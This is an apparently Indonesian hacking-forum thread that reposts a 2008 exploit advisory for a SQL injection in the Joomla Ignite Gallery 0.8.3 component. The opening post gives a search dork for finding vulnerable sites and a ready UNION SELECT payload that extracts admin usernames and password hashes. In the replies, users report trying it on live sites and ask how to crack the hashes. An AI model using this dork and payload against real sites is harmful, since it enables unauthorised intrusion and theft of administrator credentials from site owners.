Thread subject: Explore Your Brain :: Joomla Component Ignite Gallery 0.8.3 SQL Injection Vulnerability

Posted by EVA-00 on 11-10-2008 03:19
#1

#############################################################################
# #
# Joomla Component Ignite Gallery SQL Injection Vulnerability #
# #
#############################################################################


########################################

[~] Vulnerability found by: H!tm@N
[~] Contact: hitman[at]khg-crew[dot]ws
[~] Site: www.khg-crew.ws
[~] Greetz: boom3rang, KHG, urtan, chs, redc00de - [-=Kosova Hackers Group=-]

########################################

[~] ScriptName: "Joomla"
[~] Component: "Ignite Gallery (com_ignitegallery)"
[~] Version: "0.8.3"
[~] Author: "Matt Thomson"
[~] Author E-mail: "matt@ignitejoomlaextensions.com"
[~] Author URL: "www.ignitejoomlaextensions.com"

########################################

[~] DORK: inurl:"com_ignitegallery"

########################################

[~] Exploit: /index.php?option=com_ignitegallery&task=view&gallery=[SQL]&Itemid=18
[~] Example: /index.php?option=com_ignitegallery&task=view&gallery=-1+union+select+1,2,concat(username,char(58),password)KHG,4,5,6,7,8,9,10+from+jos_users--&Itemid=18

########################################

[~] Proud 2 be Albanian
[~] Proud 2 be Muslim
[~] United States of Albania

########################################

# milw0rm.com [2008-10-10]

Posted by si_tunge on 11-10-2008 13:58
#2

Waaak pusiiing gak ngerti..
KsiH penjeLasan dikit doNg paman??

Posted by EVA-00 on 11-10-2008 18:02
#3

Bug diatas sangat berbahaya, karna attacker bisa melihat username dan password administrator dalam bentuk md5 hash.

Posted by suckeve on 11-10-2008 18:33
#4

wew..tapi klo g pake componenet itu gpp kan??:D:D
soalnya website gw joomla juga nih boz

Posted by EVA-00 on 11-10-2008 18:36
#5

Kl situsnya tidak menggunakan Component Ignite Gallery 0.8.3 tidak ada masalah. aman-aman aja kok. heheheheh

Posted by sanca on 22-11-2008 11:13
#6

EVA-00 wrote:
Bug diatas sangat berbahaya, karna attacker bisa melihat username dan password administrator dalam bentuk md5 hash.


Ko gk bisa ya...??

Pas saya praktekin, ko galery nya malah blank item.

disana tercantum tulisan yang hidden gitu. pas kita blok baru ketauan tulisan nya. tapi bukan username and password tuh.

apa emang udah di patch ya?

Posted by EVA-00 on 22-11-2008 20:20
#7

Yups, componentna udah di patch oleh developer.

Posted by andi on 04-07-2009 22:49
#8

kakak klu bolhe tau,,
bug yang kaka k berikan ini buat joomla yang kberpa..
1.5 pa bukan..
:?hue?

Posted by odiex on 23-08-2010 12:45
#9

gan. kalo mecahin password hashnya gimana tuh ya gan??? :?wat?